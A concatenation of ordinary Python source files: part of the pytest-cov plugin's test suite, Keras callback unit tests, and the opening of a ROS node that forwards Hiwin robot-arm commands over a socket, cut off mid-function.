EXCLUDED_RESULT = '4 * 100%*'
def test_coveragerc(testdir):
testdir.makefile('', coveragerc=COVERAGERC)
script = testdir.makepyfile(EXCLUDED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['test_coveragerc* %s' % EXCLUDED_RESULT])
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_coveragerc_dist(testdir):
testdir.makefile('', coveragerc=COVERAGERC)
script = testdir.makepyfile(EXCLUDED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-n', '2',
max_worker_restart_0,
script)
assert result.ret == 0
result.stdout.fnmatch_lines(
['test_coveragerc_dist* %s' % EXCLUDED_RESULT])
SKIP_COVERED_COVERAGERC = '''
[report]
skip_covered = True
'''
SKIP_COVERED_TEST = '''
def func():
return "full coverage"
def test_basic():
assert func() == "full coverage"
'''
SKIP_COVERED_RESULT = '1 file skipped due to complete coverage.'
@pytest.mark.parametrize('report_option', [
'term-missing:skip-covered',
'term:skip-covered'])
def test_skip_covered_cli(testdir, report_option):
testdir.makefile('', coveragerc=SKIP_COVERED_COVERAGERC)
script = testdir.makepyfile(SKIP_COVERED_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=%s' % report_option,
script)
assert result.ret == 0
result.stdout.fnmatch_lines([SKIP_COVERED_RESULT])
def test_skip_covered_coveragerc_config(testdir):
testdir.makefile('', coveragerc=SKIP_COVERED_COVERAGERC)
script = testdir.makepyfile(SKIP_COVERED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
result.stdout.fnmatch_lines([SKIP_COVERED_RESULT])
CLEAR_ENVIRON_TEST = '''
import os
def test_basic():
os.environ.clear()
'''
def test_clear_environ(testdir):
script = testdir.makepyfile(CLEAR_ENVIRON_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
SCRIPT_SIMPLE = '''
def test_foo():
assert 1 == 1
x = True
assert x
'''
SCRIPT_SIMPLE_RESULT = '4 * 100%'
@pytest.mark.skipif('sys.platform == "win32"')
def test_dist_boxed(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--boxed',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_boxed* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"')
@pytest.mark.skipif('sys.version_info[0] > 2 and platform.python_implementation() == "PyPy"',
reason="strange optimization on PyPy3")
def test_dist_bare_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov',
'-n', '1',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_bare_cov* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_not_started_plugin_does_not_fail(testdir):
class ns:
cov_source = [True]
cov_report = ''
plugin = pytest_cov.plugin.CovPlugin(ns, None, start=False)
plugin.pytest_runtestloop(None)
plugin.pytest_terminal_summary(None)
def test_default_output_setting(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*coverage*'
])
assert result.ret == 0
def test_disabled_output(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=',
script)
stdout = result.stdout.str()
# We don't want the path to the executable to fail the test if we happen
# to put the project in a directory with "coverage" in it.
stdout = stdout.replace(sys.executable, "<SYS.EXECUTABLE>")
assert 'coverage' not in stdout
assert result.ret == 0
def test_coverage_file(testdir):
script = testdir.makepyfile(SCRIPT)
data_file_name = 'covdata'
os.environ['COVERAGE_FILE'] = data_file_name
try:
result = testdir.runpytest('-v', '--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
data_file = testdir.tmpdir.join(data_file_name)
assert data_file.check()
finally:
os.environ.pop('COVERAGE_FILE')
def test_external_data_file(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[run]
data_file = %s
""" % testdir.tmpdir.join('some/special/place/coverage-data').ensure())
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('some/special/place/coverage-data*')))
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_external_data_file_xdist(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[run]
parallel = true
data_file = %s
""" % testdir.tmpdir.join('some/special/place/coverage-data').ensure())
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'-n', '1',
max_worker_restart_0,
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('some/special/place/coverage-data*')))
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_xdist_no_data_collected(testdir):
testdir.makepyfile(target="x = 123")
script = testdir.makepyfile("""
import target
def test_foobar():
assert target.x == 123
""")
result = testdir.runpytest('-v',
'--cov=target',
'-n', '1',
script)
assert 'no-data-collected' not in result.stderr.str()
assert 'no-data-collected' not in result.stdout.str()
assert 'module-not-imported' not in result.stderr.str()
assert 'module-not-imported' not in result.stdout.str()
assert result.ret == 0
def test_external_data_file_negative(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('.coverage*')))
@xdist_params
def test_append_coverage(testdir, opts, prop):
script = testdir.makepyfile(test_1=prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
])
script2 = testdir.makepyfile(test_2=prop.code2)
result = testdir.runpytest('-v',
'--cov-append',
'--cov=%s' % script2.dirpath(),
script2,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
'test_2* %s*' % prop.result2,
])
@xdist_params
def test_do_not_append_coverage(testdir, opts, prop):
script = testdir.makepyfile(test_1=prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
])
script2 = testdir.makepyfile(test_2=prop.code2)
result = testdir.runpytest('-v',
'--cov=%s' % script2.dirpath(),
script2,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* 0%',
'test_2* %s*' % prop.result2,
])
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_append_coverage_subprocess(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-append',
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
max_worker_restart_0,
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
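# test_pth_failure below execs the contents of src/pytest-cov.pth with embed.init
# monkeypatched to raise, checking that a broken subprocess-coverage setup only
# writes a warning to stderr instead of breaking interpreter startup.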
def test_pth_failure(monkeypatch):
with open('src/pytest-cov.pth') as fh:
payload = fh.read()
class SpecificError(Exception):
pass
def bad_init():
raise SpecificError()
buff = StringIO()
from pytest_cov import embed
monkeypatch.setattr(embed, 'init', bad_init)
monkeypatch.setattr(sys, 'stderr', buff)
monkeypatch.setitem(os.environ, 'COV_CORE_SOURCE', 'foobar')
exec(payload)
assert buff.getvalue() == '''pytest-cov: Failed to setup subprocess coverage. Environ: {'COV_CORE_SOURCE': 'foobar'} Exception: SpecificError()
'''
def test_double_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov', '--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_double_cov* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_double_cov2(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov', '--cov',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_double_cov2* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_cov_reset(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-reset',
script)
assert 'coverage: platform' not in result.stdout.str()
def test_cov_reset_then_set(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-reset',
'--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cov_reset_then_set* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_cov_and_no_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov', '--no-cov',
'-n', '1',
'-s',
script)
assert 'Coverage disabled via --no-cov switch!' not in result.stdout.str()
assert 'Coverage disabled via --no-cov switch!' not in result.stderr.str()
assert result.ret == 0
def find_labels(text, pattern):
all_labels = collections.defaultdict(set)
lines = text.splitlines()
for lineno, line in enumerate(lines, start=1):
labels = re.findall(pattern, line)
for label in labels:
all_labels[label].add(lineno)
return all_labels
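# For example, with pattern r"[crst]\d+" and the two-line text
#     x = 1  # r1
#     y = 2  # r1
# find_labels returns {'r1': {1, 2}}: each label maps to the set of 1-based
# line numbers on which it appears.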
# The contexts and their labels in contextful.py
EXPECTED_CONTEXTS = {
'': 'c0',
'test_contexts.py::test_01|run': 'r1',
'test_contexts.py::test_02|run': 'r2',
'test_contexts.py::OldStyleTests::test_03|setup': 's3',
'test_contexts.py::OldStyleTests::test_03|run': 'r3',
'test_contexts.py::OldStyleTests::test_04|run': 'r4',
'test_contexts.py::OldStyleTests::test_04|teardown': 't4',
'test_contexts.py::test_05|setup': 's5',
'test_contexts.py::test_05|run': 'r5',
'test_contexts.py::test_06|setup': 's6',
'test_contexts.py::test_06|run': 'r6',
'test_contexts.py::test_07|setup': 's7',
'test_contexts.py::test_07|run': 'r7',
'test_contexts.py::test_08|run': 'r8',
'test_contexts.py::test_09[1]|setup': 's9-1',
'test_contexts.py::test_09[1]|run': 'r9-1',
'test_contexts.py::test_09[2]|setup': 's9-2',
'test_contexts.py::test_09[2]|run': 'r9-2',
'test_contexts.py::test_09[3]|setup': 's9-3',
'test_contexts.py::test_09[3]|run': 'r9-3',
'test_contexts.py::test_10|run': 'r10',
'test_contexts.py::test_11[1-101]|run': 'r11-1',
'test_contexts.py::test_11[2-202]|run': 'r11-2',
'test_contexts.py::test_12[one]|run': 'r12-1',
'test_contexts.py::test_12[two]|run': 'r12-2',
'test_contexts.py::test_13[3-1]|run': 'r13-1',
'test_contexts.py::test_13[3-2]|run': 'r13-2',
'test_contexts.py::test_13[4-1]|run': 'r13-3',
'test_contexts.py::test_13[4-2]|run': 'r13-4',
}
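# Label scheme above: 'c' marks module-level (empty context) lines, while
# 'r'/'s'/'t' mark lines executed in the run/setup/teardown phase of the
# matching test; the trailing number(s) tie the label back to the test id.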
@pytest.mark.skipif("coverage.version_info < (5, 0)")
@xdist_params
def test_contexts(testdir, opts):
with open(os.path.join(os.path.dirname(__file__), "contextful.py")) as f:
contextful_tests = f.read()
script = testdir.makepyfile(contextful_tests)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-context=test',
script,
*opts.split()
)
assert result.ret == 0
result.stdout.fnmatch_lines([
'test_contexts* 100%*',
])
data = coverage.CoverageData(".coverage")
data.read()
assert data.measured_contexts() == set(EXPECTED_CONTEXTS)
measured = data.measured_files()
assert len(measured) == 1
test_context_path = list(measured)[0]
assert test_context_path.lower() == os.path.abspath("test_contexts.py").lower()
line_data = find_labels(contextful_tests, r"[crst]\d+(?:-\d+)?")
for context, label in EXPECTED_CONTEXTS.items():
if context == '':
continue
data.set_query_context(context)
actual = set(data.lines(test_context_path))
assert line_data[label] == actual, f"Wrong lines for context {context!r}"
@pytest.mark.skipif("coverage.version_info >= (5, 0)")
def test_contexts_not_supported(testdir):
script = testdir.makepyfile("a = 1")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-context=test',
script,
)
result.stderr.fnmatch_lines([
'*argument --cov-context: Contexts are only supported with coverage.py >= 5.x',
])
assert result.ret != 0
def test_issue_417(testdir):
# https://github.com/pytest-dev/pytest-cov/issues/417
whatever = testdir.maketxtfile(whatever="")
testdir.inline_genitems(whatever)
|
test_callbacks.py
|
import os
import sys
import multiprocessing
import numpy as np
import pytest
from keras import optimizers
np.random.seed(1337)
from keras import callbacks
from keras.models import Graph, Sequential
from keras.layers.core import Dense
from keras.utils.test_utils import get_test_data
from keras import backend as K
from keras.utils import np_utils
input_dim = 2
nb_hidden = 4
nb_class = 2
batch_size = 5
train_samples = 20
test_samples = 20
def test_ModelCheckpoint():
filepath = 'checkpoint.h5'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
def test_EarlyStopping():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=20)
def test_EarlyStopping_reuse():
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
def test_LearningRateScheduler():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5)
    assert abs(float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()  # schedule 1/(1+epoch): after 5 epochs (last index 4) lr == 0.2
def test_ReduceLROnPlateau():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
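# Note on the expected values above: the optimizer starts at lr=0.1 and the
# callback uses factor=0.1, so a single plateau-triggered reduction gives
# lr ~= 0.01 (first run, where epsilon=10 makes every epoch look like a
# plateau), while the second run (epsilon=0) registers normal improvements
# and the lr is expected to stay at 0.1.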
@pytest.mark.skipif((K._BACKEND != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard():
import shutil
import tensorflow as tf
import keras.backend.tensorflow_backend as KTF
old_session = KTF.get_session()
filepath = './logs'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
def data_generator_graph(train):
while 1:
if train:
yield {'X_vars': X_train, 'output': y_train}
else:
yield {'X_vars': X_test, 'output': y_test}
# case 1 Sequential
with tf.Graph().as_default():
session = tf.Session('')
KTF.set_session(session)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1)
cbks = [tsb]
# fit with validation data
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
# fit generator with validation data
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
callbacks=cbks)
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
callbacks=cbks)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
# case 2 Graph
with tf.Graph().as_default():
session = tf.Session('')
KTF.set_session(session)
model = Graph()
model.add_input(name='X_vars', input_shape=(input_dim,))
model.add_node(Dense(nb_hidden, activation="sigmoid"),
name='Dense1', input='X_vars')
model.add_node(Dense(nb_class, activation="softmax"),
name='last_dense',
input='Dense1')
model.add_output(name='output', input='last_dense')
model.compile(optimizer='sgd', loss={'output': 'mse'})
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1)
cbks = [tsb]
# fit with validation
model.fit({'X_vars': X_train, 'output': y_train},
batch_size=batch_size,
validation_data={'X_vars': X_test, 'output': y_test},
callbacks=cbks, nb_epoch=2)
# fit wo validation
model.fit({'X_vars': X_train, 'output': y_train},
batch_size=batch_size,
callbacks=cbks, nb_epoch=2)
# fit generator with validation
model.fit_generator(data_generator_graph(True), 1000, nb_epoch=2,
validation_data={'X_vars': X_test, 'output': y_test},
callbacks=cbks)
# fit generator wo validation
model.fit_generator(data_generator_graph(True), 1000, nb_epoch=2,
callbacks=cbks)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
KTF.set_session(old_session)
def test_LambdaCallback():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5)
p.join()
assert not p.is_alive()
@pytest.mark.skipif((K._BACKEND != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard_with_ReduceLROnPlateau():
import shutil
filepath = './logs'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
if __name__ == '__main__':
pytest.main([__file__])
|
HiwinRA605_socket_ros_test_20190626114758.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them to the control-side PC over a socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
Socket = 0
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy initially
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
# (the generator simply ends here; an explicit "raise StopIteration" would turn
# into a RuntimeError under PEP 479 on Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
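# Usage sketch of the switch/case idiom above (hypothetical values), mirroring
# how Socket_command() uses it further down:
#
#   for case in switch(value):
#       if case(1):
#           ...  # runs when value == 1
#           break
#       if case(2):
#           ...  # runs when value == 2
#           break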
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------ server side -------
def point_data(req): ## receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
Socket_command()
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
Socket_command()
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive arm speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
Socket_command()
return(1)
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the ROS service server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------ server side end -------
##---------- socket packet transmission --------------##
##--------------- send arm commands over the socket -----------------
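# Socket_command() turns the most recently received service data (target pose,
# arm mode, speed mode) into a TCP command string via the TCP/Taskcmd helpers
# and sends it to the control PC; socket_cmd.action is reset to 5 afterwards so
# the same command is not issued twice.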
def Socket_command():
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
